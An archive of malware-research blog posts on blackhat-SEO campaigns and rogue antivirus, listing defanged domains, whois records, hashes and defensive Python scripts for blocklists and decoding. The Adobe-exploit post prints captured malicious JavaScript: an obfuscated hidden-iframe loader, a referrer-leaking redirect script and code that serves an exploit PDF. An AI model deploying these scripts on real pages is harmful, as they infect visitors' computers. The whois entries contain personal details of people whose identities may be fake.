Archive for the 'Blackhat SEO' Category

21 Aug

new rogue domain: makeptotect73.co.cc

If you’re looking for the latest news about Honda, you might be surprised to find a rogueware called MySecurityShield popping up instead.

Some of the affected search terms:
honda recall 2010 list
honda recall 2010

Whois record for makeptotect73.co.cc

Registrant Contact:
Name: JONG SUNG, KIM
Address: 864-2, JANGHANGDONG, ILSAN
City: GOYANG,GYEOUNGGI
Country: South-Korea

hxxp://makeptotect73.co.cc
Result: 2/16 (13 %)
Domain Hash: 4546911ccc95e03d4290f0a5209c0077
URLVoid

The following file was dropped:
packupdate8_195.exe
Result: 7/39 (17.9%)
MD5: 64c63db4f9bb57a85120b822fbd4dfb0
VirusTotal
Anubis Report
ThreatExpert Report

Related domain:
hxxp://get-download41.co.cc

Screenshot examples:

Fake scan page, Windows XP style

Fake scan page, Windows 7 style

14 Jun

Introducing: Roguevertising

A new term in the rogue industry – written by Bart Parys


Today I will be talking about a new trend that is spreading quickly across the internet.
In this post I will explain what it is all about and provide additional information, such as screenshots and measures that can be taken to tackle these threats.

It all started when I found a new rogue domain:
hxxp://antispyware.com
Antispyware2010 website

The following domains are associated with Antispyware.com:
hxxp://antispyware2009.com
hxxp://Errorsmart.com
hxxp://Registryclear.com
hxxp://Remover.org

They all push the same ‘product’: a scan for malware on your computer. You can even request Live Technical Support.
(No, not really: the link just sends you to the download page.)

When you download their product, you can find the following setup file in your chosen download folder:
setupxv.exe

Depending on the website you landed on, you may instead get a file called setup.exe.

The file setupxv.exe currently has a 53.66% detection ratio on VirusTotal; the most common classification is Fakealert:
VirusTotal Result
You may also receive a file with the same name (setupxv.exe) but a slightly modified binary. You can find an example of this on VirusTotal:
VirusTotal Result

For more information about this rogue program and the others described down below, I refer to the end of this document, where you can find some screenshots of my findings.


Then, after some Google searches on the fake testimonials and other text taken from their website, I landed on the following rogue domain:

hxxp://againstadware.com
AgainstAdware website

Unfortunately, you cannot download their product anymore, as the setup file has been removed.

The following domains are associated with Againstadware.com:

hxxp://Fileboxx.com
hxxp://Incredible-mail-download.com
hxxp://Secureoneantivirus.com
hxxp://Wincleanerpro.com


Now, why am I introducing the term roguevertising ?

You might have heard of malvertising (short for malicious advertising): malicious advertisements that, once clicked, deliver a drive-by download or push the visitor to install some program that will supposedly clean and scan the computer.

Lately I have found a lot of websites using malvertising specifically for rogue security software. That is how the term roguevertising was born.

A few examples of these websites:

hxxp://www.hopelinenc.org/forum/anti-spyware

hxxp://www.thedietsolutionprogram.ws/weblog/anti-spyware

hxxp://www.thedietsolutionprogram.ws/rating/anti-spyware

hxxp://www.perfectoptimizer5.com/?hop=aseafood

hxxp://www.bestspywareprogram.net
antispyware.com roguevertising
Along with legitimate antispyware applications, “Antispyware” shows up in the list … with an advertisement leading to the download link of the rogue (served through an advertising mirror).

hxxp://threats.browsetag.com/antispyware
hxxp://www.plrarticlesoftware.biz/forum/anti-spyware
hxxp://www.earth4energyoffical.com/weblog/anti-spyware
hxxp://www.earth4energyoffical.com/article/adware-alert
hxxp://www.earth4energyoffical.com/article/privacy-control
hxxp://www.theaffiliatecode.ws/weblog/anti-spyware
hxxp://www.legitonlinejobshome.com/tags/anti-spyware

Additionally, I stumbled upon the following rogue domain:
hxxp://spywareremover.com
SpywareRemover website

When you download their product, you can find the following setup file in your chosen download folder:
SpywareRemover icon
Setupxv.exe

That’s right: setupxv all over again, with a different icon and once more a modified binary.

This setupxv.exe currently has a 39.02% detection ratio on VirusTotal; the most common classification is AdSpy:
VirusTotal Result


Do you surf the internet ? Does your PC run slow ? Do you get bombarded with annoying pop-up ads ?
Then you are most likely to land on the following page:
AdwareAlert website

Yet again, setupxv is presented to you with a nice new icon:
AdwareAlert icon

The current VirusTotal detection rate is 48.78%. The file was again modified to evade antivirus detection, and this build also introduces a different GUI (see the screenshots at the end of this post).
VirusTotal Result

The setupxv rogueware campaign is on a roll; below are some domains associated with AdwareAlert.com:

hxxp://Cbadvance.com
hxxp://Errorkiller.com
hxxp://Evidenceeraser.com
hxxp://Malwarebot.com
hxxp://Malwareremovalbot.com
hxxp://Registrybot.com
hxxp://Registrysmart.com
hxxp://Regrecall.com
hxxp://Regsweep.com
hxxp://Spywarebot.com
hxxp://Spywarestop.com


Next rogueware domain on our list is:
hxxp://www.antispywarebotpro.com
AntiSpywareBot website

As always the download is free, and so is the malicious payload:
asbot icon
Setupxv.exe

Current VirusTotal detection rate is 48.78% .
VirusTotal Result

Related domains in this case are:

hxxp://mail.remover.org
hxxp://www.privacycontrolpro.com
hxxp://errorsweeperpro.com
hxxp://Regcleanlite.com
hxxp://www.browsetag.com/spyware/virus/threats
hxxp://support.browsetag.com/certified/antispyware
hxxp://www.spywarenuker-gary.com/blog/anti-spyware
hxxp://www.spywarenuker-gary.com/blog/adware-alert

As you might have noticed, roguevertising appears on these last pages. Spywarenuker Gary needs to find another name, as his directory is filled with malicious advertisements and bloatware:
Part of a roguevertising directory


I have also gathered the following URLs, all related to the setupxv rogueware campaign:

hxxp://adwarealert.com
hxxp://Cbadvance.com
hxxp://Errorkiller.com
hxxp://Evidenceeraser.com
hxxp://Malwarebot.com
hxxp://Malwareremovalbot.com
hxxp://Registrybot.com
hxxp://Registrysmart.com
hxxp://Regrecall.com
hxxp://Regsweep.com
hxxp://Spywarebot.com
hxxp://Spywareremover.com
hxxp://Spywarestop.com

One of the downloads from the sites above, again setupxv:
Setupxv.exe

This new version of setupxv has only a 4.88% detection ratio on VirusTotal:
VirusTotal Result

… and installs a program called RegClean:
RegClean Setup Wizard


The next rogue, which you might remember, is Spyware Cease:

hxxp://www.spywarecease.com
SpywareCease website

SpywareCease comes in the following setup file:
spywarecease icon

It currently has a 12.20% detection ratio on VirusTotal:
VirusTotal Result

Associated domains and roguevertising links for Spywarecease.com:

hxxp://www.spycease.com
hxxp://www.micronichefinderhome.com/blog/spyware-cease
hxxp://entrepreneur.useoursite.com/go.php?p=SSPYKILLER
hxxp://offto.net/SpywareCease_4ee8
hxxp://viral-link-exchange.info/clickbank-supercenter/html/spyware-cease-1-converting-anti-spyware-software.htm
hxxp://www.cheapsale.org/html/spyware-cease-1-converting-anti-spyware-software.htm
hxxp://www.easyfixcomputersolutions.com/home.php
hxxp://www.easydigitalsales.com/33027/Spyware-Cease—1-Converting-Anti-Spyware-Software.html


We are moving on to the last roguevertising campaign, brought to you by 007 Anti-Spyware.
I stumbled upon this one while investigating the SpywareCease roguevertising campaign.
hxxp://www.007antispyware.com
Unfortunately (or luckily) this site was down at the time of writing, but I found a roguevertising domain for this one:
hxxp://007antyspyware.blogspot.com
007 Anti-Spyware website (blog)

The blog provides an ad-served mirror for the setup file 007antipsyware.exe:
007antipsyware.exe

At the moment the file has a very low detection ratio on VirusTotal: only 4.88% of the scanners detect it,
namely as Adware.SpywareCease. Rings a bell somewhere…
VirusTotal Result

But the fun is not over yet. When visiting this roguevertiser’s Twitter page, you are offered the Googod toolbar. Now we can add spyware to the list, since the Googod toolbar is built on the toolbar platform of
Conduit Ltd., a company well known for its spyware activities. The toolbar is available for Internet Explorer, Mozilla Firefox and Safari.

hxxp://www.googod.ourtoolbar.com
Googod toolbar website

Detection ratio on VirusTotal: 2.44%
VirusTotal Result


Conclusion

Although malvertising is not a new concept, roguevertising is.
I hope this post has made it a bit clearer what it is all about, and how a single rogueware campaign is, and will remain, able to infect a lot of users.
No, the rogueware will not clean or speed up your computer.

Pushing rogueware downloads through advertisements on weblogs, bloatware websites or even on Google is a phenomenon we will have to deal with. In this case the setupxv rogueware campaign was able to spread itself across many domains, each of which can lure users into downloading and installing the software.

But there might be hope. In my opinion, websites like Antispyware.com could be prevented from ever seeing the light of day by registering the domains that lend themselves to roguevertising before the rogue operators do. The setupxv creators would then not have been able to register this domain, and visitors would instead see a placeholder stating, for example, that the site is under construction or that the domain was registered for the sole purpose of keeping it out of rogue hands.
Another option is to have such a domain point to an antivirus vendor; Antivirus.com, for example, is registered to Trend Micro.
After all, Antispyware.com sounds legitimate, and a visitor will not notice anything suspicious on the site itself. Look it up on URLVoid, however, and you get a 32% dangerous rating:
URLVoid Result

Tools like Web of Trust (WOT) can warn you before you land on sites like Antispyware.com.
Other countermeasures are host-file based or user based, for example the MVPS Hosts file or Sandboxie. Common sense will always be the most important factor, so remember the rule: if it looks like a rogue, it probably is!
That does not mean every suspicious-looking program is malicious: run a few checks with your favourite search engine, or use URLVoid and VirusTotal as a reference.
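
To make the block-list advice concrete, here is a small script that turns defanged IOC lines in the formats used on this page (hxxp:// URLs with paths, bare names, *.wildcards) into an MVPS-style hosts-file block and checks proxy log lines against it. This is an added example, not code from the original post; the IOCs are a subset of the domains named above, and the Squid-style log lines are constructed for illustration rather than real traffic.

```python
"""Normalise defanged IOCs into a hosts-file block and match proxy logs.

Added example, not code from the original post. RAW_IOCS is a subset of the
domains named on this page; SAMPLE_LOG is constructed, not real traffic.
"""
import re
from urllib.parse import urlsplit

# A subset of the roguevertising IOCs from this post, in the mixed formats
# the post uses: hxxp:// URLs with paths, bare names, capitalised names.
RAW_IOCS = """
hxxp://antispyware.com
hxxp://www.antispywarebotpro.com
hxxp://www.thedietsolutionprogram.ws/weblog/anti-spyware
hxxp://spywareremover.com
hxxp://007antyspyware.blogspot.com
hxxp://www.googod.ourtoolbar.com
Spywarecease.com
"""

# Constructed Squid-style access log lines (not real traffic); field 7 is the URL.
SAMPLE_LOG = """\
1276523401.101   120 10.0.0.5 TCP_MISS/200 2048 GET http://www.antispywarebotpro.com/setupxv.exe - DIRECT/192.0.2.10 application/octet-stream
1276523402.220    80 10.0.0.7 TCP_MISS/200 5120 GET http://www.example.com/index.html - DIRECT/192.0.2.20 text/html
1276523403.330    95 10.0.0.5 TCP_MISS/200 1024 GET http://spywareremover.com/download.php?aff=1 - DIRECT/192.0.2.30 text/html
"""


def refang(token):
    """hxxp:// -> http:// so urlsplit() recognises the scheme."""
    return re.sub(r"^hxxp(s?)://", r"http\1://", token, flags=re.IGNORECASE)


def to_hostname(token):
    """Reduce one IOC line to a lowercase base hostname, or None for blanks.
    Leading '*.' and 'www.' are stripped so subdomains match via is_blocked()."""
    token = refang(token.strip())
    if not token or token.startswith("#"):
        return None
    if "://" not in token:
        token = "http://" + token
    host = urlsplit(token).hostname
    if not host:
        return None
    for prefix in ("*.", "www."):
        if host.startswith(prefix):
            host = host[len(prefix):]
    return host


def load_blocklist(text):
    return sorted({h for h in map(to_hostname, text.splitlines()) if h})


def hosts_block(blocklist):
    """MVPS-style hosts entries. 0.0.0.0 rather than 127.0.0.1 so a blocked
    name fails immediately instead of connecting to a local listener."""
    lines = ["# roguevertising block list"]
    for host in blocklist:
        lines.append(f"0.0.0.0 {host}")
        lines.append(f"0.0.0.0 www.{host}")
    return "\n".join(lines) + "\n"


def is_blocked(host, blocklist):
    """True if host or any parent domain (above the TLD) is on the list."""
    labels = host.lower().rstrip(".").split(".")
    listed = set(blocklist)
    return any(".".join(labels[i:]) in listed for i in range(len(labels) - 1))


def scan_proxy_log(lines, blocklist):
    """Return (client, host, url) for each request to a blocked host."""
    hits = []
    for line in lines:
        fields = line.split()
        if len(fields) < 7:
            continue
        host = urlsplit(fields[6]).hostname
        if host and is_blocked(host, blocklist):
            hits.append((fields[2], host, fields[6]))
    return hits


if __name__ == "__main__":
    blocklist = load_blocklist(RAW_IOCS)
    print(hosts_block(blocklist))
    for client, host, url in scan_proxy_log(SAMPLE_LOG.splitlines(), blocklist):
        print(f"{client} -> {host}: {url}")
```

Run it as a script to print the hosts block and the matching requests. The parent-domain match in is_blocked() is what lets a list of base names catch www. and other subdomains, which a literal hosts file cannot do on its own; the hosts block goes into the hosts file, the matcher runs over your proxy logs.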

Further rogueware screenshots are provided down below. Thank you for reading.


007 Antispyware
Setup screen
Shortcut icon
Interface

Adware Alert
Setup screen
Shortcut icon
Interface

Antispyware 2008
Setup screen
Shortcut icon
Interface

18 May

New rogue domains under xorg.pl

You might have heard that Brian Vickers of Red Bull Racing was taken to hospital last week for reasons that were not disclosed.
This week, searching for that news can still redirect you to malicious domains and land you on a rogueware. These are all hosted under xorg.pl, a domain known for malicious activity.

Whois record for XOrg.pl

Registrant Contact:
Name: NetArt Spolka Akcyjna S.K.A.
Phone: +48.801 33 22 33
Address: Rondo Mogilskie 1
City: 31-516 Krakow
Country: Poland

(NetArt is a Polish hosting provider and registrar, so this record identifies the hosting company rather than whoever runs the rogue; it is where abuse reports go, not who to blame.)

packupdate_build107_2045.exe
Result: 16/41 (39.02%)
MD5: 9d44165fa043a2f9674055055233598e (the same hash as packupdate_build107_287.exe in the safetypcwork4.com post below: the identical binary, served under a new file name and domain)
VirusTotal
Anubis Report
ThreatExpert Report
Fake scanner pages (note: some might still be active, so be careful):
hxxp://www1.checker26-pd.xorg.pl
hxxp://www1.savepc20-pd.xorg.pl
hxxp://www1.bestfastclean-31p.xorg.pl
hxxp://www2.allmostclean-38pd.xorg.pl
hxxp://www2.allmostclean-29pd.xorg.pl
hxxp://www1.fastcleanup-46p.xorg.pl

This rogue is called “My Security Engine“.

Some screenshot examples:


The Fake Scanner Page


Another Fake Scanner Page
Note that I was using XP but still received the Vista-style look.

When executing the dropped file ( packupdate_build107_2045.exe ):

Setup of the Rogue Program

22 Apr

new rogue domain: safetypcwork4.com

Today I was browsing Google for the recent McAfee false positive. Blackhat SEO has been targeting the keywords for this subject; some related keywords are: McAfee, wecorl, patch, DAT5958.
Suddenly, I got redirected to a fake scanner page.

Whois record for safetypcwork4.com

Registrant Contact:
Name: Garritt Kooken
Phone: +86.592257788 fax: +86.592257788
Address: Rue de Virton 237
City: Evegnee 4631
Country: Belgium

(Note the Chinese +86 phone number against a Belgian street address; mismatched details like these are a typical sign of fabricated registrant data.)

packupdate_build107_287.exe
Result: 8/40 (20.00%)
MD5: 9d44165fa043a2f9674055055233598e
VirusTotal
Anubis Report
ThreatExpert Report
Fake Scanner Page: hxxp://www2.safetypcwork4.com

This rogue is called “Windows Performance Center“.

Some screenshot examples:


The Fake Scanner Page

When executing the dropped file ( packupdate_build107_287.exe ):
Setup of the Rogue Program

05 Jul

Blackhat SEO campaign with domains flooding search results-UPDATED

There is a blackhat SEO campaign that redirects users to fake scanner websites in order to infect them. Each of these domains has many pages stuffed with keywords to get high rankings in search results. Once a result is clicked, the user is redirected to the drive-by download site of the day. Here is how it works, followed by a list of some of the domains. Each landing page first loads a counter script:

<script type="text/javascript" src="/counter?i=x-Di3AgjVhR8ak4on4gk1b2YXOLV8tKk9vfMw_qaRu8alxLqUphKSiBSqzUuyL1vtJUnVRoVCp_qCODoee2QvAwsxetjrz1uKFNY2brg"></script>

The following javascript is then loaded…

var t3dbj5es5;if (typeof(encodeURIComponent) == 'function') t3dbj5es5 = encodeURIComponent;else if (typeof(escape) == 'function') t3dbj5es5 = escape;else t3dbj5es5 = function (text) { return text; };document.write('<script src="http://xozkyaf.com/stat?s=54dpw11f64Bj9qRA;r=' + (document.referrer ? t3dbj5es5(document.referrer) : '') + '" type="text/javascript"></script>');

The script returned by xozkyaf.com, which receives the visitor’s referrer in the r= parameter, consists of a single redirect:

document.location.href='http://spacefunk.cn/go.php?id=2012&key=b6a0fad62&p=1';

So the chain is: the keyword-stuffed landing page loads /counter, which loads the xozkyaf.com stat script (reporting the referrer), which redirects to
hxxp://spacefunk.cn/go.php?id=2012&key=b6a0fad62&p=1
which in turn redirects to the fake scanning page of the day, as selected by the malware distributors.

ufumtrwz.com 208.73.210.26
rmeged.com 208.87.149.250
stqbcfkjp.com 69.64.147.209
vhwdhjfig.com 69.64.147.210
pazjbw.com 69.64.147.210
rklktu.com 69.64.147.211
nbzqkp.com 69.64.147.212
wqtlto.com 69.64.147.212
klqltr.com 69.64.147.212
obirrd.com 69.64.147.212
qylzioqty.com 69.64.147.213
brohpql.com 69.64.147.214
atoonoyxm.com 69.64.147.215
ilmtvne.com 69.64.147.215
udtlgrzm.com 69.64.147.216
tnkpghmt.com 69.64.147.217
lpstjr.com 69.64.147.217
auvwbkdbe.com 69.64.147.217
colixfpf.com 69.64.155.120
qtltmzq.com 69.64.155.120
tgshpj.com 69.64.155.121
mkutvrah.com 69.64.155.121
nzadvyul.com 69.64.155.121
dvgbuqyg.com 69.64.155.121
nsqaidn.com 69.64.155.122
sambmq.com 69.64.155.122
sgkoqblfp.com 69.64.155.122
gxprzo.com 69.64.155.123
ujqqccmvd.com 69.64.155.124
dhmhcze.com 69.64.155.124
xarhwsvf.com 69.64.155.125
fitvahmz.com 69.64.155.126
vqtxnqmre.com 69.64.155.127
buzstyltd.com 69.64.155.127

UPDATED: 7/5/09

tvciucde.com 174.129.244.106 174.129.241.185
jmguhkxaj.com 194.110.162.82
nhroiv.com 194.110.162.83
gyadqcuoc.com 194.110.162.85
igvutelu.com 194.110.162.86
nqcngszq.com 194.110.162.86
birkkane.com 194.110.162.86
ouvthweg.com 194.110.162.89
vwsevihm.com 194.110.162.94
gakvgp.com 194.110.162.95
onnrdm.com 194.110.162.227
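
The domain list above is most useful as pivot data: the throwaway names are packed into a handful of /24s, and several of them share a single address. The following script groups the pairs by network, shows what else sits next to a known-bad name, and flags machine-generated labels. It is an added example, not code from the original post; DOMAIN_IPS is a subset of the list above, copied as printed, and looks_random() is my own rough heuristic, not a published classifier.

```python
"""Pivot on the domain/IP pairs from this post: group by hosting network,
find co-hosted names, flag machine-generated labels.

Added example, not code from the original post. DOMAIN_IPS is a subset of
the list above; looks_random() is a crude heuristic of my own.
"""
import re
from collections import defaultdict
from ipaddress import ip_address, ip_network

# Subset of the domain/IP pairs from the post (one domain resolved to two IPs).
DOMAIN_IPS = """
ufumtrwz.com 208.73.210.26
rmeged.com 208.87.149.250
stqbcfkjp.com 69.64.147.209
vhwdhjfig.com 69.64.147.210
pazjbw.com 69.64.147.210
nbzqkp.com 69.64.147.212
wqtlto.com 69.64.147.212
colixfpf.com 69.64.155.120
qtltmzq.com 69.64.155.120
tgshpj.com 69.64.155.121
tvciucde.com 174.129.244.106 174.129.241.185
jmguhkxaj.com 194.110.162.82
nhroiv.com 194.110.162.83
igvutelu.com 194.110.162.86
"""


def parse_domain_ips(text):
    """'domain ip [ip ...]' lines -> list of (domain, IPv4Address) pairs."""
    pairs = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 2:
            continue
        for ip in fields[1:]:
            pairs.append((fields[0].lower(), ip_address(ip)))
    return pairs


def cluster_by_network(pairs, prefix=24):
    """Map 'a.b.c.0/24' (or the exact '/32' address) -> sorted domains in it."""
    groups = defaultdict(set)
    for domain, ip in pairs:
        groups[str(ip_network(f"{ip}/{prefix}", strict=False))].add(domain)
    return {net: sorted(doms) for net, doms in groups.items()}


def cohosted(pairs, seed, prefix=24):
    """Domains sharing a network with seed: the pivot from one known-bad
    name to the rest of the infrastructure."""
    found = set()
    for doms in cluster_by_network(pairs, prefix).values():
        if seed in doms:
            found.update(doms)
    found.discard(seed)
    return sorted(found)


def looks_random(domain):
    """Crude check for throwaway names like those above: no vowels, a run of
    four or more consonants, or fewer than one vowel per four letters."""
    label = domain.lower().split(".")[0]
    vowels = sum(c in "aeiou" for c in label)
    longest_run = max((len(r) for r in re.findall(r"[^aeiou]+", label)), default=0)
    return vowels == 0 or longest_run >= 4 or vowels < len(label) / 4


def report(pairs):
    """Networks hosting two or more listed domains, plus random-looking names."""
    clusters = cluster_by_network(pairs)
    busy = {net: doms for net, doms in clusters.items() if len(doms) >= 2}
    flagged = sorted({d for d, _ in pairs if looks_random(d)})
    return busy, flagged


if __name__ == "__main__":
    pairs = parse_domain_ips(DOMAIN_IPS)
    busy, flagged = report(pairs)
    for net, doms in sorted(busy.items()):
        print(net, ", ".join(doms))
    print("random-looking:", ", ".join(flagged))
```

The /24 grouping is the strong signal here (three networks carry almost the whole list); the name heuristic is only a tie-breaker and will miss pronounceable junk such as rmeged.com, so do not block on it alone.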

17 Jun

Adobe exploit page installs malware updatedb87.cn & nicevideo15.com

This domain exploits vulnerabilities in Adobe Reader to install malware on the victim’s computer. The exploit runs silently and the user is none the wiser. The chain is only triggered when the visitor arrives via a search-engine referrer, so keep that in mind when trying to reproduce it.

WARNING: URL’s may still be active. VERY DANGEROUS. Proceed at your own risk.

hxxp://updatedb87.cn/out/index.php

function load(code,dfunc,anticasp)
{
eval(dfunc);
decrypt(code);
}
load('<`B15ni[B15niAS1(i1I"u"[Xh1Soo`YlI"YS"[g`(QZI"m"[Zi`lZQI"m"[X1hI"ZQQFx;;\'F(5Qi(~8/.hY;S\'Q;`Y(i9.FZF"><;`B15ni>',unescape('function decrypt%28n%29
%7Bvar l%2Cch%2Cind%2Cq%3D%22%22%2Ckey%3D%22OD%26%3Ax9T6H%40fBAC%23y_wgloSEb
%7EK %5BchZei%60a5z-%7Bjv%21Pk%7Cr1mnYU%7DqV7%2F%3BpF%5DsXG%3DILtQJ0u%5C%272Md
%284%2A%22%3Bfor%28l%3D0%3Bl%3Cn.length%3Bl%2B%2B%29%7Bch%3Dn.charAt%28l%29
%3Bind%3Dkey.indexOf%28ch%29%3Bif%28ind%3E-1%29%7Bif%28ind%3D%3D0%29%7Bind
%3D79%7Dq%2B%3Dkey.charAt%28ind-1%29%7D else %7Bq%2B%3Dch%7D%7D%3Bdocument.write
%28q%29%7D'));

Deobfuscates to

<iframe frameBorder="0" scrolling="no" width="1" height="1" src="http://updatedb87.cn/out/index.php"></iframe>
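
The decrypt() routine above is a plain single-alphabet substitution: every character that occurs in the key is replaced by the character before it in the key, everything else is copied through, and document.write() then injects the result. The following Python reimplements it so the loader can be decoded without handing the page to a browser. This is an added example, not code from the original page; CODE and DFUNC_ENCODED are the two arguments of the page's load() call, copied from the listing above with the line wrapping removed, and the helper names are mine.

```python
"""Decode the decrypt()-based loader from updatedb87.cn/out/index.php
without executing it.

Added example, not code from the original page. CODE and DFUNC_ENCODED are
the first two arguments of the page's load(code, dfunc, anticasp) call,
copied from the listing with line wrapping removed; everything else is mine.
"""
import re
from urllib.parse import unquote

# First argument of load(): the encoded iframe.
CODE = '''<`B15ni[B15niAS1(i1I"u"[Xh1Soo`YlI"YS"[g`(QZI"m"[Zi`lZQI"m"[X1hI"ZQQFx;;'F(5Qi(~8/.hY;S'Q;`Y(i9.FZF"><;`B15ni>'''

# Second argument of load(): the percent-encoded source of decrypt(), which
# the page feeds through unescape() and then eval()s.
DFUNC_ENCODED = (
    "function decrypt%28n%29%7Bvar l%2Cch%2Cind%2Cq%3D%22%22%2Ckey%3D%22OD%26%3Ax9T6H%40fBAC%23y_wgloSEb"
    "%7EK %5BchZei%60a5z-%7Bjv%21Pk%7Cr1mnYU%7DqV7%2F%3BpF%5DsXG%3DILtQJ0u%5C%272Md"
    "%284%2A%22%3Bfor%28l%3D0%3Bl%3Cn.length%3Bl%2B%2B%29%7Bch%3Dn.charAt%28l%29"
    "%3Bind%3Dkey.indexOf%28ch%29%3Bif%28ind%3E-1%29%7Bif%28ind%3D%3D0%29%7Bind"
    "%3D79%7Dq%2B%3Dkey.charAt%28ind-1%29%7D else %7Bq%2B%3Dch%7D%7D%3Bdocument.write"
    "%28q%29%7D"
)


def js_unescape(s):
    """JavaScript's unescape(): %uXXXX and %XX sequences back to characters."""
    s = re.sub(r"%u([0-9A-Fa-f]{4})", lambda m: chr(int(m.group(1), 16)), s)
    return unquote(s)


def extract_key(dfunc_encoded):
    """Pull the substitution alphabet out of the decoded decrypt() source.
    The key is a double-quoted JS string literal whose only escape is \\',
    so a one-character backslash unescape is enough for this sample."""
    src = js_unescape(dfunc_encoded)
    m = re.search(r'key="((?:\\.|[^"\\])*)"', src)
    if not m:
        raise ValueError("no key literal in decrypt() source")
    return re.sub(r"\\(.)", r"\1", m.group(1))


def js_charat(s, i):
    """String.prototype.charAt(): empty string when out of range, no error."""
    return s[i] if 0 <= i < len(s) else ""


def decrypt(code, key):
    """Same mapping as the page's decrypt(): each character found in the key
    becomes the character before it in the key; others pass through. The
    ind==0 -> 79 branch indexes past the 78-character key, so charAt()
    yields "" and the first key character ('O') decodes to nothing."""
    out = []
    for ch in code:
        ind = key.find(ch)
        if ind > -1:
            if ind == 0:
                ind = 79
            out.append(js_charat(key, ind - 1))
        else:
            out.append(ch)
    return "".join(out)


def decode_loader(code, dfunc_encoded):
    return decrypt(code, extract_key(dfunc_encoded))


if __name__ == "__main__":
    print(decode_loader(CODE, DFUNC_ENCODED))
```

Note the off-by-one the author left in: the ind == 0 branch sets ind to 79, but the decoded key has 78 characters, so charAt(78) returns an empty string and an 'O' in the ciphertext silently disappears. A reimplementation has to reproduce that quirk rather than wrap modulo the key length, or longer payloads from the same kit will decode wrongly.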

The page in this iframe contains the following code, which uses a malicious PDF to install malware on the system. The first script is a second obfuscation layer: a hex-encoded payload (truncated in this listing) that rbyr() XOR-decodes and eval()s. The second script checks for the Adobe Acrobat plugin via navigator.plugins (or the AcroPDF.PDF / PDF.PdfCtrl ActiveX controls in Internet Explorer) and only then writes an iframe pointing at pdf.php, so the exploit PDF is served only to browsers that will actually render it.

<script>vubqza="6e7d666b7c616766286d625c314a4069392021737e697a286c7b[...]";jwgakx="function rbyr(){gp=Math.PI;bhx=
parseInt;ffv='length';mvr=bhx(~((gp&gp)|(~gp&gp)&(gp&~gp)|(~gp&~gp)));
ybagye=bhx(((mvr&mvr)|(~mvr&mvr)&(mvr&~mvr)|(~mvr&~mvr))&1);nlwj=
ybagye< +'Code');mxeugy=eval;for(snr=mvr;snr jwgakx.charCodeAt(snr);gg%=unescape(mvr+unescape(''+'%7'+'8'+'')+(1<<6))
;for(snr=mvr;snr ('%78')+vubqza.charAt(snr)+vubqza.charAt(snr+bhx(ybagye)))^gg);try
{mxeugy(mog);}catch(e){try{eval(mog);}catch(e) {window.location='/';}
}}try{eval('rbyr();')}catch(e) {alert('err');}";eval(jwgakx);</script>
<script>
function pdf_gen2()
{
var detectAcrobat = false;
try
{
if( navigator.plugins && navigator.mimeTypes.length)
{
for( var i = 0; i < navigator.plugins.length; i++)
{
var name = navigator.plugins[i].name;
if( name.indexOf('Adobe Acrobat') != -1)
{
detectAcrobat = true;
break;
}
}
}
else
{
var obj = null;
obj = new ActiveXObject("AcroPDF.PDF");
if( !obj) obj = new ActiveXObject("PDF.PdfCtrl");
if( obj) detectAcrobat = true;
}
}
catch(e)
{
}
if( detectAcrobat)
{
document.write('<iframe src="pdf.php"></iframe>');
}
else return false;
}
pdf_gen2();
</script>

All have been added to our database.

update.exe
Result: 17/41 (41.47%)
MD5: bcb016582e40e6312f7bf742c0dfcedd
VirusTotal
ThreatExpert Analysis
hxxp://updatedb87.cn/out/load.php?id=0

pdrv.exe or stron_1245063771.exe
Result: 6/41 (14.64%)
MD5: ca557e7460c222ef90e9d36881f6ac53
VirusTotal
ThreatExpert Analysis
hxxp://61.235.117.71/files/

update_936.pdf
Result: 6/41 (14.64%)
MD5: 5a96297e851288426cfa96022d0c822d
VirusTotal
Wepawet Analysis
hxxp://updatedb87.cn/out/pdf.php

pp.10.exe
Result: 15/41 (36.59%)
MD5: d23ad273d30ad73edfac5afddf5e6550
VirusTotal
ThreatExpert Analysis
hxxp://61.235.117.71/files/

The page also leads the user to a site claiming that an ‘AdobeViewer’ must be installed, and starts a download (the Setup.exe from nicevideo15.com listed below).

Whois entry for nicevideo15.com 94.232.248.70
Konstantin Berdeev
Email: camelot1984@gmail.com
Organization: Private person
Address: Moskva, m. Leninskoe, d. 192
City: Moskva
State: Moskvoskaya
ZIP: 174633
Country: RU
Phone: +7.4953996729
Fax: +7.49599672913


*.nicevideo44.com
*.pornotvnetwork.us
*.videofx4you2.com
*.videogtx4you2.com
nicevideo44.com
ns1.videofx4you2.com
ns1.videogtx4you2.com
ns2.nicevideo44.com
ns2.pornotvnetwork.us
ns2.videofx4you2.com
ns2.videogtx4you2.com
pornotvnetwork.us
videofx4you2.com
videogtx4you2.com

Setup.exe
Result: 10/41 (24.4%)
MD5: 5a96297e851288426cfa96022d0c822d (identical to the MD5 listed for update_936.pdf above, which cannot be right for two different files; treat one of the two hashes as a transcription error)
VirusTotal
ThreatExpert Analysis
hxxp://nicevideo15.com/software/f75b610c1c/14250/1/

10 Jun

New codec domains: exe-file-boom.com & hi-my-tube.com

Found these domains spreading a fake codec today. Both were registered today.

Whois entry for exe-file-boom.com 66.197.171.6
Isaac Donnelly (isaacdonn@gmail.com)
3711 Eastland Avenue
Hattiesburg
Mississippi,39402
US
Tel. +001.88795890983


exe-file-boom.com
my-exe-profile.com
web-exe-depositary.com
mp3downloadablesongs.com

Whois entry for hi-my-tube.com 216.240.143.7
Stephine Smith (stsmisss@gmail.com)
2810 Kovar Road
Westboro
Maine,01581
US
Tel. +001.76778989543


*.best-crystal-tube.com
*.big-tube-list.com
*.champtube2009.com
*.chipeztube2009.com
*.get-mega-tube.com
*.happy-tube-video.com
*.my-flare-tube.com
*.my-tube-zone.com
*.powerful-tube.com
*.tubecollection2009.com
*.video-tube-dot.com
*.wondertubes2009.com
better-tube-show.com
big-tube-list.com
fllcorp.com
get-mega-tube.com
megacooltubes2009.com
ns2.best-crystal-tube.com
ns2.big-tube-list.com
ns2.champtube2009.com
ns2.chipeztube2009.com
ns2.get-mega-tube.com
ns2.happy-tube-video.com
ns2.megaporntubes09.com
ns2.my-flare-tube.com
ns2.my-tube-zone.com
ns2.powerful-tube.com
ns2.tall-tubex.com
ns2.tube-xxx-tv2009.com
ns2.tubecollection2009.com
ns2.video-tube-dot.com
ns2.wondertubes2009.com
premier-tube-site.com
sunny-tube-house.com
www.best-crystal-tube.com
www.big-tube-list.com
www.champtube2009.com
www.chipeztube2009.com
www.get-mega-tube.com
www.my-tube-zone.com

streamviewer.40014.exe
Result: 9/40 (22.5%)
MD5: 78a3631fbc7d93ce07c33233416a2176
VirusTotal
ThreatExpert Analysis
